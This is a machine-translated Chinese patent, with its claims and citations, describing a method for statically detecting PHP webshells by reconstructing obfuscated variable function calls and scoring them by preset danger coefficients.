If it should be noted that when $ and at least one letter, numeral, underscore three simultaneously be present, need Started with $, such as:$ _ POST [' aaa '], if not using $ as beginning, then obtained parameter sets will not be inconsistent The matched rule for stating PHP regular expressions is closed, such as:a$b.
It should be noted that for foregoing each method embodiment, in order to be briefly described, therefore it is all expressed as to a system The combination of actions of row, but those skilled in the art should know, the present invention is not limited by described sequence of movement System, because according to the present invention, some steps can use other orders or carry out simultaneously.Secondly, art technology Personnel should also know that embodiment described in this description belongs to preferred embodiment, involved action and module Not necessarily necessary to the present invention.
Through the above description of the embodiments, those skilled in the art can be understood that according to above-mentioned implementation The mode of general hardware platform necessary to the method for the assessments code file security of example can add by software realizes, when So can also be by hardware, but the former is more preferably embodiment in many cases.Based on such understanding, the present invention The part that is substantially contributed in other words to prior art of technical scheme can be embodied in the form of software product, The computer software product is stored in a storage medium (such as ROM/RAM, magnetic disc, CD), including some fingers Make to cause a station terminal equipment (can be mobile phone, computer, server, or network equipment etc.) to perform sheet Invent the method described in each embodiment.
Embodiment 2
According to embodiments of the present invention, a kind of dress for being used to implement the method for above-mentioned assessment code file security is additionally provided Put embodiment.Fig. 4 is a kind of structured flowchart of the device of assessment code file security according to embodiments of the present invention. As shown in figure 4, the device includes:Parsing module 10, for parsing variable function from code file to be detected And assignment expression;Recovery module 20, function is directly invoked for being restored according to variable function and assignment expression With original call function;Evaluation module 30, for by default safety coefficient corresponding with directly invoking function and in advance If safety coefficient corresponding with original call function the security of code file is assessed.
The technical scheme that the embodiment of the present invention is provided can apply to the webshell Static Detections of PHP scripts. By the code file write using PHP code is parsed (including:Morphological analysis, semantic analysis), for by The variable function that character string is spliced is reduced, while directly invokes function and code according to what is restored Assignment expression in file is carried forward code backtracking, until original call function is restored, to judge code text Whether webshell common mathematical functions or dangerous function are included in part.Then, then by default with directly invoking function pair Answer safety coefficient (such as:The harmful grade of common mathematical function or dangerous function) and default and original call function pair The safety coefficient answered is assessed the security of code file, judge the code file whether be invader (or attack Person) malice upload webshell files.
Alternatively, Fig. 5 is a kind of structure of device for assessing code file security according to the preferred embodiment of the invention Block diagram.As shown in figure 5, parsing module 10 can include:Converting unit 100, for carrying out morphology to code file Analysis, Token sequences are converted to by the character string in code file;Resolution unit 102, for from Token sequences Variable function and assignment expression are parsed in row.
Alternatively, resolution unit 102 can include:First searches subelement (not shown), for according to default Each Token in order traversal Token sequences, lookup classification are operator, and value is the first Token of left round parentheses; Judgment sub-unit (not shown), in the case where finding the first Token, judging and the first Token Whether the Token of adjacent previous traversal classification is variable;First parsing subelement (not shown), is used for When judgment sub-unit output is is, it is operator to begin look for classification from the first Token, and value is right round parentheses 2nd Token, and by the parameter sets between the first Token and the 2nd Token and default regular expression phase In the case of matching somebody with somebody, by current lookup to function be recorded as variable function, return to first and search subelement, until parsing Go out variable function.
After above-mentioned Tokens arrays are obtained by morphological analysis, can according to preset order (such as:According to morphology point The order that parser is analyzed code file) successively travel through Tokens arrays in each Token.Due to function Calling needs to use round parentheses (i.e. " () "), therefore, it is necessary first to which it is operator to search classification, and value is left circle The Tokens [i] of bracket (i.e. " (") (equivalent to above-mentioned first Token);Secondly, classification is being found as operation Symbol, value is the Tokens [i] of left round parentheses (i.e. " (") and then the Token [i-1] for further obtaining previous traversal Classification whether be variable;Then, if Token [i-1] classification is variable, classification is continued to search for as operation Symbol, value are the Tokens [i+n] (equivalent to above-mentioned 2nd Token, n is positive integer) of right round parentheses, and by the , will be current in the case that parameter sets between one Token and the 2nd Token match with default regular expression The function found is recorded as variable function, wherein, as long as above-mentioned parameter set can meet PHP regular expressions Matched rule.Such as:Parameter sets can include but is not limited at least one of:Alphabetical, digital, lower stroke Line, additional character (such as:$), user accesses the parameter of PHP webpages transmission.
If it should be noted that when $ and at least one letter, numeral, underscore three simultaneously be present, need Started with $, such as:$ _ POST [' aaa '], if not using $ as beginning, then obtained parameter sets will not be inconsistent The matched rule for stating PHP regular expressions is closed, such as:a$b.
Alternatively, resolution unit 102 can include:Second searches subelement (not shown), for according to default Each Token in order traversal Token sequences, lookup classification are operator, and value is the 3rd Token of equal sign; Subelement (not shown) is obtained, in the case where finding the 3rd Token, obtaining and the 3rd Token The Token of adjacent previous traversal, and the Token got value is recorded as the assignment table that current lookup arrives The variable of assignment is treated up in formula;Second parsing subelement (not shown), for beginning look for class from the 3rd Token Not Wei operator, value be branch the 4th Token, obtain the 3rd Token and the 4th Token between one or Multiple Token, and by one or more Token be recorded as current lookup to assignment expression in expression to be calculated Formula, return to second and search subelement, until parsing assignment expression.
After above-mentioned Tokens arrays are obtained by morphological analysis, it is with obtaining variable function difference:Assignment table Mainly realized up to formula by equal sign (=).Therefore, can according to preset order (such as:According to lexical analyzer pair The order that code file is analyzed) successively travel through Tokens arrays in each Token.Due to assignment expression Equal sign (i.e. "=") is needed to use, therefore, it is necessary first to which it is operator to search classification, and value is equal sign (i.e. "=") Tokens [i] (equivalent to above-mentioned 3rd Token);Secondly, the Token [i-1] of previous traversal is further obtained, And by the Token got value be recorded as current lookup to assignment expression in treat the variable of assignment;Then, It is operator to continue to search for classification, and for the Tokens [i+n] of branch, (equivalent to above-mentioned 4th Token, n is just to value Integer), and one or more Token between Tokens [i] and Tokens [i+n] are recorded as what current lookup arrived Expression formula to be calculated in assignment expression.
Alternatively, as shown in figure 5, recovery module 20 can include:First reduction unit 200, for turning from default Searched in code rule and directly invoke function with what variable function matched;Processing unit 202, for calculating assignment table The value corresponding with the variable of each assignment expression up in formula, and taken in the variable of each assignment expression with corresponding Corresponding relation is established between value;Second reduction unit 204, for using default transcoding rule and corresponding relation from direct Original call function is identified in call function.
Alternatively, as shown in figure 5, evaluation module 30 can include:Reading unit 300, for from default memory block Read safety coefficient corresponding with directly invoking function and safety coefficient corresponding with original call function in domain;Calculate single Member 302, for pair safety coefficient corresponding with directly invoking function and safety coefficient corresponding with original call function Summation operation is carried out, obtains safety evaluation result.
According to embodiments of the present invention, another method for being used to implement above-mentioned assessment code file security is additionally provided Device embodiment.Fig. 6 is the structural frames of another device for assessing code file security according to embodiments of the present invention Figure.As shown in fig. 6, the device includes:Parsing module 40, for parsing variable from code file to be detected Function;Recovery module 50, function is directly invoked for being restored according to variable function;Evaluation module 60, for passing through Default safety coefficient corresponding with directly invoking function is assessed the security of code file.
Assignment expression can be both included in code file to be detected, naturally it is also possible to not comprising assignment expression. And it is relatively easy for the PHP code file not comprising assignment expression, its assessment mode, Main Basiss preset transcoding Rule (such as:ASCII character transcoding rule) restored from PHP code file and directly invoke function.Then, then The security of code file is assessed using default safety coefficient corresponding with directly invoking function.
Embodiment 3
Embodiments of the invention can provide a kind of terminal, and the terminal can be in terminal group Any one computer terminal.Alternatively, in the present embodiment, above computer terminal can also replace with The terminal devices such as mobile terminal.
Alternatively, in the present embodiment, above computer terminal can be located in multiple network equipments of computer network At least one network equipment.
Alternatively, Fig. 7 is a kind of structured flowchart of terminal according to embodiments of the present invention.As shown in fig. 7, The terminal can include:One or more (one is only shown in figure) processors and memory.
Wherein, memory can be used for storage software program and module, such as the assessment code file in the embodiment of the present invention Programmed instruction/module corresponding to the method and apparatus of security, processor are stored in the software journey in memory by operation Sequence and module, so as to perform various function application and data processing, that is, realize above-mentioned assessment code file safety The method of property.Memory may include high speed random access memory, can also include nonvolatile memory, such as one or Multiple magnetic storage devices, flash memory or other non-volatile solid state memories.In some instances, memory can Further comprise that relative to the remotely located memory of processor, these remote memories network connection to end can be passed through End.The example of above-mentioned network includes but is not limited to internet, intranet, LAN, mobile radio communication and its group Close.
Processor can call the information and application program of memory storage by transmitting device, to perform following step:
S1:Variable function and assignment expression are parsed from code file to be detected;
S2:Restored according to variable function and assignment expression and directly invoke function and original call function;
S3:By default safety coefficient corresponding with directly invoking function and default corresponding with original call function Safety coefficient is assessed the security of code file.
Optionally, above-mentioned processor can also carry out the program code of following steps:Morphological analysis is carried out to code file, Character string in code file is converted into Token sequences;Variable function and tax are parsed from Token sequences Value expression.
Optionally, above-mentioned processor can also carry out the program code of following steps:Finding step:According to preset order Each Token in Token sequences is traveled through, lookup classification is operator, and value is the first Token of left round parentheses; Judgment step:In the case where finding the first Token, the previous traversal adjacent with the first Token is judged Whether Token classification is variable;If it is, it is operator to begin look for classification from the first Token, value is 2nd Token of right round parentheses, and by the parameter sets between the first Token and the 2nd Token and default canonical In the case that expression formula matches, by current lookup to function be recorded as variable function, return to finding step, until Parse variable function.
Optionally, above-mentioned processor can also carry out the program code of following steps:Finding step:According to preset order Each Token in Token sequences is traveled through, lookup classification is operator, and value is the 3rd Token of equal sign;Obtain Step:In the case where finding the 3rd Token, the Token of the previous traversal adjacent with the 3rd Token is obtained, And by the Token got value be recorded as current lookup to assignment expression in treat the variable of assignment;From the 3rd It is operator that Token, which begins look for classification, and value is the 4th Token of branch, obtains the 3rd Token and the 4th Token Between one or more Token, and by one or more Token be recorded as current lookup to assignment expression in Expression formula to be calculated, finding step is returned to, until parsing assignment expression.
Optionally, above-mentioned processor can also carry out the program code of following steps:From default transcoding rule search with What variable function matched directly invokes function;Calculate corresponding with the variable of each assignment expression in assignment expression Value, and establish corresponding relation between the variable of each assignment expression and corresponding value;Using default transcoding Rule and corresponding relation identify original call function from directly invoking in function.
Optionally, above-mentioned processor can also carry out the program code of following steps:Read from default storage region and straight Connect safety coefficient corresponding to call function and safety coefficient corresponding with original call function;Pair with directly invoke function Corresponding safety coefficient and safety coefficient corresponding with original call function carry out summation operation, obtain safety evaluation As a result.
As another embodiment of the present invention, processor can also call memory storage by transmitting device Information and application program, to perform following step:
S1:Variable function is parsed from code file to be detected;
S2:Restored according to variable function and directly invoke function;
S3:The security of code file is assessed by default safety coefficient corresponding with directly invoking function.
Using the embodiment of the present invention, the side of variable function and assignment expression is parsed from code file to be detected Formula, restored according to variable function and assignment expression directly invoke function and original call function and by it is default with Safety coefficient corresponding to function and default safety coefficient corresponding with original call function are directly invoked to code file Security is assessed, it is achieved thereby that the detection efficiency of variable function type webshell code files is improved, lifting inspection Survey the technique effect of result accuracy, so solve provided in correlation technique for webshell code files Safety detection scheme detection efficiency is relatively low, the not high technical problem of accuracy.
It will appreciated by the skilled person that the structure shown in Fig. 7 is only to illustrate, terminal can also be Smart mobile phone (such as Android phone, iOS mobile phones), tablet personal computer, applause computer and mobile internet device The terminal device such as (Mobile Internet Devices, referred to as MID), PAD.Fig. 7 its not to above-mentioned electronics The structure of device causes to limit.For example, terminal may also include the component more or less than shown in Fig. 7 (such as network interface, display device), or there is the configuration different from shown in Fig. 7.
One of ordinary skill in the art will appreciate that all or part of step in the various methods of above-described embodiment is can be with Completed by program come command terminal device-dependent hardware, the program can be stored in a computer-readable storage medium In matter, storage medium can include:Flash disk, read-only storage (Read-Only Memory, referred to as ROM), Random access device (Random Access Memory, referred to as RAM), disk or CD etc..
Embodiment 4
Embodiments of the invention additionally provide a kind of storage medium.Alternatively, in the present embodiment, above-mentioned storage medium It can be used for preserving the program code performed by the method for the assessment code file security that above-described embodiment one is provided.
Alternatively, in the present embodiment, above-mentioned storage medium can be located in computer network Computer terminal group In any one terminal, or in any one mobile terminal in mobile terminal group.
Alternatively, in the present embodiment, storage medium is arranged to the program code that storage is used to perform following steps:
S1:Variable function and assignment expression are parsed from code file to be detected;
S2:Restored according to variable function and assignment expression and directly invoke function and original call function;
S3:By default safety coefficient corresponding with directly invoking function and default corresponding with original call function Safety coefficient is assessed the security of code file.
Optionally, above-mentioned storage medium is also configured to program code of the storage for performing following steps:To code text Part carries out morphological analysis, and the character string in code file is converted into Token sequences;Parsed from Token sequences Go out variable function and assignment expression.
Optionally, above-mentioned storage medium is also configured to program code of the storage for performing following steps:Finding step: Each Token in Token sequences is traveled through according to preset order, lookup classification is operator, and value is left round parentheses The first Token;Judgment step:In the case where finding the first Token, judge adjacent with the first Token Whether the Token of previous traversal classification is variable;If it is, classification is begun look for as behaviour from the first Token According with, value is the 2nd Token of right round parentheses, and by the parameter sets between the first Token and the 2nd Token In the case of matching with default regular expression, by current lookup to function be recorded as variable function, return is looked into Step is looked for, until parsing variable function.
Optionally, above-mentioned storage medium is also configured to program code of the storage for performing following steps:Finding step: Each Token in Token sequences is traveled through according to preset order, lookups classification is operator, and value is the of equal sign Three Token;Obtaining step:In the case where finding the 3rd Token, obtain adjacent with the 3rd Token previous The Token of individual traversal, and by the Token got value be recorded as current lookup to assignment expression in wait to assign The variable of value;It is operator to begin look for classification from the 3rd Token, and value is the 4th Token of branch, obtains the One or more Token between three Token and the 4th Token, and one or more Token are recorded as currently Expression formula to be calculated in the assignment expression found, finding step is returned to, until parsing assignment expression.
Optionally, above-mentioned storage medium is also configured to program code of the storage for performing following steps:Turn from default Searched in code rule and directly invoke function with what is matched in variable function;Calculate in assignment expression with each assignment Value corresponding to the variable of expression formula, and between the variable of each assignment expression and corresponding value foundation it is corresponding close System;Original call function is identified from directly invoking using default transcoding rule and corresponding relation in function.
Optionally, above-mentioned storage medium is also configured to program code of the storage for performing following steps:Deposited from default Read safety coefficient corresponding with directly invoking function and safety coefficient corresponding with original call function in storage area domain;It is right Safety coefficient corresponding with directly invoking function and safety coefficient corresponding with original call function carry out summation operation, Obtain safety evaluation result.
Alternatively, in the alternative scheme of the present embodiment, storage medium is arranged to storage and is used to perform following steps Program code:
S1:Variable function is parsed from code file to be detected;
S2:Restored according to variable function and directly invoke function;
S3:The security of code file is assessed by default safety coefficient corresponding with directly invoking function.
The embodiments of the present invention are for illustration only, do not represent the quality of embodiment.
In the above embodiment of the present invention, the description to each embodiment all emphasizes particularly on different fields, and does not have in some embodiment The part of detailed description, it may refer to the associated description of other embodiment.
In several embodiments provided herein, it should be understood that disclosed technology contents, can be by other Mode realize.Wherein, device embodiment described above is only schematical, such as the division of the unit, Only a kind of division of logic function, can there are other dividing mode, such as multiple units or component when actually realizing Another system can be combined or be desirably integrated into, or some features can be ignored, or do not perform.It is another, institute Display or the mutual coupling discussed or direct-coupling or communication connection can be by some interfaces, unit or mould The INDIRECT COUPLING of block or communication connection, can be electrical or other forms.
The unit illustrated as separating component can be or may not be physically separate, show as unit The part shown can be or may not be physical location, you can with positioned at a place, or can also be distributed to On multiple NEs.Some or all of unit therein can be selected to realize the present embodiment according to the actual needs The purpose of scheme.
In addition, each functional unit in each embodiment of the present invention can be integrated in a processing unit, can also That unit is individually physically present, can also two or more units it is integrated in a unit.It is above-mentioned integrated Unit can both be realized in the form of hardware, can also be realized in the form of SFU software functional unit.
If the integrated unit realized in the form of SFU software functional unit and as independent production marketing or in use, It can be stored in a computer read/write memory medium.Based on such understanding, technical scheme essence On all or part of the part that is contributed in other words to prior art or the technical scheme can be with software product Form is embodied, and the computer software product is stored in a storage medium, including some instructions are causing one Platform computer equipment (can be personal computer, server or network equipment etc.) performs each embodiment institute of the present invention State all or part of step of method.And foregoing storage medium includes:USB flash disk, read-only storage (ROM, Read-Only Memory), random access memory (RAM, Random Access Memory), mobile hard disk, magnetic disc or CD Etc. it is various can be with the medium of store program codes.
Described above is only the preferred embodiment of the present invention, it is noted that for the ordinary skill people of the art For member, under the premise without departing from the principles of the invention, some improvements and modifications can also be made, these are improved and profit Decorations also should be regarded as protection scope of the present invention.

Claims (14)

  1. A kind of 1. method for assessing code file security, it is characterised in that including:
    Variable function and assignment expression are parsed from code file to be detected;
    Restored according to the variable function and the assignment expression and directly invoke function and original call function;
    By default the corresponding safety coefficient of function and the default and original call letter are directly invoked with described Safety coefficient corresponding to number is assessed the security of the code file.
  2. 2. according to the method for claim 1, it is characterised in that the variable letter is parsed from the code file Several and described assignment expression includes:
    Morphological analysis is carried out to the code file, the character string in the code file is converted into word Token sequences;
    The variable function and the assignment expression are parsed from the Token sequences.
  3. 3. according to the method for claim 2, it is characterised in that parse the variable from the Token sequences Function includes:
    Finding step:Each Token in the Token sequences is traveled through according to preset order, searching classification is Operator, value are the first Token of left round parentheses;
    Judgment step:In the case where finding the first Token, judge adjacent with the first Token The Token classification of previous traversal whether be variable;
    If it is, it is operator to begin look for classification from the first Token, value is the of right round parentheses Two Token, and by the parameter sets between the first Token and the 2nd Token and default canonical In the case that expression formula matches, by current lookup to function be recorded as variable function, return and described search step Suddenly, until parsing the variable function.
  4. 4. according to the method for claim 2, it is characterised in that parse the assignment from the Token sequences Expression formula includes:
    Finding step:Each Token in the Token sequences is traveled through according to preset order, searching classification is Operator, value are the 3rd Token of equal sign;
    Obtaining step:In the case where finding the 3rd Token, obtain adjacent with the 3rd Token Previous traversal Token, and the Token got value is recorded as the assignment table that current lookup arrives The variable of assignment is treated up in formula;
    It is operator to begin look for classification from the 3rd Token, and value is the 4th Token of branch, is obtained One or more Token between 3rd Token and the 4th Token, and will be one or more Individual Token be recorded as the current lookup to assignment expression in expression formula to be calculated, return to the lookup Step, until parsing the assignment expression.
  5. 5. method according to any one of claim 1 to 4, it is characterised in that according to the variable function and institute State assignment expression and restore and described directly invoke function and the original call function and include:
    From default transcoding rule search with the variable function match described in directly invoke function;
    Value corresponding with the variable of each assignment expression in the assignment expression is calculated, and in each tax Corresponding relation is established between the variable of value expression and corresponding value;
    The original is identified from described directly invoke using the regular and described corresponding relation of the default transcoding in function Beginning call function.
  6. 6. according to the method for claim 1, it is characterised in that by with it is described directly invoke function it is corresponding safety Coefficient and safety coefficient corresponding with the original call function are assessed the security of the code file Including:
    From default storage region read with it is described directly invoke the corresponding safety coefficient of function and with the original tune The safety coefficient corresponding to function;
    Pair directly invoke the corresponding safety coefficient of function and safety corresponding with the original call function with described Coefficient carries out summation operation, obtains safety evaluation result.
  7. A kind of 7. method for assessing code file security, it is characterised in that including:
    Variable function is parsed from code file to be detected;
    Restored according to the variable function and directly invoke function;
    The security of the code file is entered with the function corresponding safety coefficient that directly invokes by default Row is assessed.
  8. A kind of 8. device for assessing code file security, it is characterised in that including:
    Parsing module, for parsing variable function and assignment expression from code file to be detected;
    Recovery module, for restored according to the variable function and the assignment expression directly invoke function and Original call function;
    Evaluation module, for by it is default with it is described directly invoke the corresponding safety coefficient of function and it is default with Safety coefficient corresponding to the original call function is assessed the security of the code file.
  9. 9. device according to claim 8, it is characterised in that the parsing module includes:
    Converting unit, for carrying out morphological analysis to the code file, by the character sequence in the code file Row are converted to word Token sequences;
    Resolution unit, for parsing the variable function and assignment expression from the Token sequences Formula.
  10. 10. device according to claim 9, it is characterised in that the resolution unit includes:
    First searches subelement, for traveling through each Token in the Token sequences according to preset order, Lookup classification is operator, and value is the first Token of left round parentheses;
    Judgment sub-unit, in the case where finding the first Token, judging and the first Token Whether the Token of adjacent previous traversal classification is variable;
    First parsing subelement, for when judgment sub-unit output is is, being opened from the first Token It is operator to begin to search classification, value for right round parentheses the 2nd Token, and by the first Token and institute State in the case that parameter sets between the 2nd Token match with default regular expression, by current lookup To function be recorded as variable function, return to described first and search subelement, until parsing the variable function.
  11. 11. device according to claim 9, it is characterised in that the resolution unit includes:
    Second searches subelement, for traveling through each Token in the Token sequences according to preset order, Lookup classification is operator, and value is the 3rd Token of equal sign;
    Subelement is obtained, in the case where finding the 3rd Token, obtaining and the 3rd Token The Token of adjacent previous traversal, and the Token got value is recorded as the tax that current lookup arrives The variable of assignment is treated in value expression;
    Second parsing subelement, it is operator for beginning look for classification from the 3rd Token, value is point Number the 4th Token, obtain one or more Token between the 3rd Token and the 4th Token, And by one or more of Token be recorded as the current lookup to assignment expression in expression to be calculated Formula, return to described second and search subelement, until parsing the assignment expression.
  12. 12. the device according to any one of claim 8 to 11, it is characterised in that the recovery module includes:
    First reduction unit, for searched from default transcoding rule match with the variable function it is described straight Connect call function;
    Processing unit, for calculating corresponding with the variable of each assignment expression in the assignment expression take Value, and establish corresponding relation between the variable of each assignment expression and corresponding value;
    Second reduction unit, for being directly invoked using the regular and described corresponding relation of the default transcoding from described The original call function is identified in function.
  13. 13. device according to claim 8, it is characterised in that the evaluation module includes:
    Reading unit, for from default storage region read with it is described directly invoke the corresponding safety coefficient of function with And safety coefficient corresponding with the original call function;
    Computing unit, for pair with it is described directly invoke the corresponding safety coefficient of function and with the original call Safety coefficient corresponding to function carries out summation operation, obtains safety evaluation result.
  14. A kind of 14. device for assessing code file security, it is characterised in that including:
    Parsing module, for parsing variable function from code file to be detected;
    Recovery module, function is directly invoked for being restored according to the variable function;
    Evaluation module, for by it is default with the corresponding safety coefficient of function that directly invokes to the code The security of file is assessed.
CN201610282740.8A 2016-04-29 2016-04-29 Method and device for evaluating security of code file Active CN107341399B (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN201610282740.8A CN107341399B (en) 2016-04-29 2016-04-29 Method and device for evaluating security of code file

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN201610282740.8A CN107341399B (en) 2016-04-29 2016-04-29 Method and device for evaluating security of code file

Publications (2)

Publication Number Publication Date
CN107341399A true CN107341399A (en) 2017-11-10
CN107341399B CN107341399B (en) 2020-09-04

Family

ID=60221962

Family Applications (1)

Application Number Title Priority Date Filing Date
CN201610282740.8A Active CN107341399B (en) 2016-04-29 2016-04-29 Method and device for evaluating security of code file

Country Status (1)

Country Link
CN (1) CN107341399B (en)

Cited By (11)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN108459962A (en) * 2018-01-23 2018-08-28 平安普惠企业管理有限公司 Code specification detection method, device, terminal device and storage medium
CN108959071A (en) * 2018-06-14 2018-12-07 湖南鼎源蓝剑信息科技有限公司 A kind of detection method and system of the PHP deformation webshell based on RASP
CN109408113A (en) * 2018-09-03 2019-03-01 平安普惠企业管理有限公司 A kind of code text processing method, system and terminal device
CN109660499A (en) * 2018-09-13 2019-04-19 阿里巴巴集团控股有限公司 It attacks hold-up interception method and device, calculate equipment and storage medium
CN110413284A (en) * 2019-08-06 2019-11-05 腾讯科技(深圳)有限公司 Morphology analysis methods, device, computer equipment and storage medium
CN110795731A (en) * 2019-10-09 2020-02-14 新华三信息安全技术有限公司 Page detection method and device
CN111368304A (en) * 2020-03-31 2020-07-03 绿盟科技集团股份有限公司 Malicious sample category detection method, device and equipment
CN112800427A (en) * 2021-04-08 2021-05-14 北京邮电大学 Webshell detection method and device, electronic equipment and storage medium
CN113032779A (en) * 2021-02-04 2021-06-25 中国科学院软件研究所 Multi-behavior joint matching method and device based on behavior parameter Boolean expression rule
CN114006706A (en) * 2020-07-13 2022-02-01 深信服科技股份有限公司 Network security detection method, system, computer device and readable storage medium
CN114422148A (en) * 2022-03-25 2022-04-29 北京长亭未来科技有限公司 Webshell framework depicting and detecting method, device and equipment

Citations (3)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN101436128A (en) * 2007-11-16 2009-05-20 北京邮电大学 Software test case automatic generating method and system
CN102955914A (en) * 2011-08-19 2013-03-06 百度在线网络技术(北京)有限公司 Method and device for detecting security flaws of source files
CN105069355A (en) * 2015-08-26 2015-11-18 厦门市美亚柏科信息股份有限公司 Static detection method and apparatus for webshell deformation

Patent Citations (3)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN101436128A (en) * 2007-11-16 2009-05-20 北京邮电大学 Software test case automatic generating method and system
CN102955914A (en) * 2011-08-19 2013-03-06 百度在线网络技术(北京)有限公司 Method and device for detecting security flaws of source files
CN105069355A (en) * 2015-08-26 2015-11-18 厦门市美亚柏科信息股份有限公司 Static detection method and apparatus for webshell deformation

Non-Patent Citations (1)

* Cited by examiner, † Cited by third party
Title
TRUONG DINH TU等: "《Evil-hunter:a novel web shell detection system based on scoring scheme》", 《JOURNAL OF SOUTHEAST UNIVERSITY (ENGLISH EDITION)》 *

Cited By (19)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN108459962A (en) * 2018-01-23 2018-08-28 平安普惠企业管理有限公司 Code specification detection method, device, terminal device and storage medium
CN108459962B (en) * 2018-01-23 2021-09-03 平安普惠企业管理有限公司 Code normalization detection method and device, terminal equipment and storage medium
CN108959071A (en) * 2018-06-14 2018-12-07 湖南鼎源蓝剑信息科技有限公司 A kind of detection method and system of the PHP deformation webshell based on RASP
CN109408113A (en) * 2018-09-03 2019-03-01 平安普惠企业管理有限公司 A kind of code text processing method, system and terminal device
CN109660499A (en) * 2018-09-13 2019-04-19 阿里巴巴集团控股有限公司 It attacks hold-up interception method and device, calculate equipment and storage medium
CN109660499B (en) * 2018-09-13 2021-07-27 创新先进技术有限公司 Attack interception method and device, computing equipment and storage medium
CN110413284A (en) * 2019-08-06 2019-11-05 腾讯科技(深圳)有限公司 Morphology analysis methods, device, computer equipment and storage medium
CN110413284B (en) * 2019-08-06 2023-10-17 腾讯科技(深圳)有限公司 Lexical analysis method, lexical analysis device, computer equipment and storage medium
CN110795731A (en) * 2019-10-09 2020-02-14 新华三信息安全技术有限公司 Page detection method and device
CN110795731B (en) * 2019-10-09 2022-02-25 新华三信息安全技术有限公司 Page detection method and device
CN111368304A (en) * 2020-03-31 2020-07-03 绿盟科技集团股份有限公司 Malicious sample category detection method, device and equipment
CN111368304B (en) * 2020-03-31 2022-07-05 绿盟科技集团股份有限公司 Malicious sample category detection method, device and equipment
CN114006706A (en) * 2020-07-13 2022-02-01 深信服科技股份有限公司 Network security detection method, system, computer device and readable storage medium
CN113032779A (en) * 2021-02-04 2021-06-25 中国科学院软件研究所 Multi-behavior joint matching method and device based on behavior parameter Boolean expression rule
CN113032779B (en) * 2021-02-04 2024-01-02 中国科学院软件研究所 Multi-behavior joint matching method and device based on behavior parameter Boolean expression rule
CN112800427B (en) * 2021-04-08 2021-09-28 北京邮电大学 Webshell detection method and device, electronic equipment and storage medium
CN112800427A (en) * 2021-04-08 2021-05-14 北京邮电大学 Webshell detection method and device, electronic equipment and storage medium
CN114422148A (en) * 2022-03-25 2022-04-29 北京长亭未来科技有限公司 Webshell framework depicting and detecting method, device and equipment
CN114422148B (en) * 2022-03-25 2024-04-09 北京长亭未来科技有限公司 Framework depiction and detection method, device and equipment of Webshell

Also Published As

Publication number Publication date
CN107341399B (en) 2020-09-04

Similar Documents

Publication Publication Date Title
CN107341399A (en) Assess the method and device of code file security
CN103559235B (en) A kind of online social networks malicious web pages detection recognition methods
CN109005145A (en) A kind of malice URL detection system and its method extracted based on automated characterization
CN107220386A (en) Information-pushing method and device
CN107659570A (en) Webshell detection methods and system based on machine learning and static and dynamic analysis
CN110266647A (en) It is a kind of to order and control communication check method and system
CN104156490A (en) Method and device for detecting suspicious fishing webpage based on character recognition
CN106961419A (en) WebShell detection methods, apparatus and system
CN106874253A (en) Recognize the method and device of sensitive information
CN107704453A (en) A kind of word semantic analysis, word semantic analysis terminal and storage medium
CN113098887A (en) Phishing website detection method based on website joint characteristics
CN108134784A (en) web page classification method and device, storage medium and electronic equipment
CN106572117A (en) Method and apparatus for detecting WebShell file
CN110427755A (en) A kind of method and device identifying script file
CN112464666B (en) Unknown network threat automatic discovery method based on hidden network data
CN106599160A (en) Content rule base management system and encoding method thereof
CN111181922A (en) Fishing link detection method and system
CN110191096A (en) A kind of term vector homepage invasion detection method based on semantic analysis
CN111866004A (en) Security assessment method, apparatus, computer system, and medium
CN109918648B (en) Rumor depth detection method based on dynamic sliding window feature score
CN115757991A (en) Webpage identification method and device, electronic equipment and storage medium
CN108920909B (en) Counterfeit mobile application program discrimination method and system
CN110020161B (en) Data processing method, log processing method and terminal
CN101470752A (en) Search engine method based on keyword resolution scheduling
CN106611029A (en) Method and device for improving site search efficiency in website

Legal Events

Date Code Title Description
PB01 Publication
PB01 Publication
SE01 Entry into force of request for substantive examination
SE01 Entry into force of request for substantive examination
GR01 Patent grant
GR01 Patent grant